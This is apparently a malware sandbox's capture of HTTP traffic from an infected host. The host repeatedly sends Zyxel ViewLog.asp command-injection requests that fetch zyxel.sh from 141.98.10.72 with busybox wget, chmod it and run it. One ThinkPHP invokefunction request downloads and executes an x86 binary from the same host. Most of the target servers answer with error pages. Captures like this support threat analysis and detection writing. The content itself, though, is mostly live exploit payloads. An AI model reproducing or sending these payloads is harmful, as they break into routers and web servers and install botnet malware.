                                                      Feb 14, 2024 09:29:22.326268911 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      216192.168.2.155375894.130.225.968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.405056000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.606607914 CET498INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:22 GMT
                                                      Server: Apache/2.4.53 (Debian)
                                                      Content-Length: 304
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.53 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      217192.168.2.154795231.131.118.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.446533918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.690109015 CET224INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 106
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      218192.168.2.154751494.120.42.2228080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.449443102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      219192.168.2.154401494.120.51.298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.451316118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      220192.168.2.1542252112.74.32.15580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.833929062 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:23.178036928 CET512INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 345
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:29:22 GMT
                                                      Server: lighttpd/1.4.53
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      221192.168.2.154184431.136.52.1628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.834897041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.514317036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.858248949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:27.578205109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:32.954062939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.705745935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:06.489063978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:49.495951891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      222192.168.2.153671294.122.195.778080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.860575914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      223192.168.2.154325685.94.171.2058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.271420002 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.544038057 CET193INHTTP/1.1 307
                                                      LOCATION: https://192.168.0.14:80/cgi-bin/ViewLog.asp
                                                      X-Download-Options: noopen
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-XSS-Protection: 1; mode=block
                                                      Content-Length: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      224192.168.2.155015495.141.98.358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.278220892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.493364096 CET492INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:21:19 GMT
                                                      Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.3.8-ZS5.5.0
                                                      Content-Length: 217
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      225192.168.2.154422895.216.120.1058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.284677029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.505455017 CET614INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      226192.168.2.155956494.121.176.1348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.312619925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      227192.168.2.155569862.29.58.1978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.314024925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      228192.168.2.154176294.120.221.1468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.314158916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      229192.168.2.155348094.121.30.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:24.314313889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
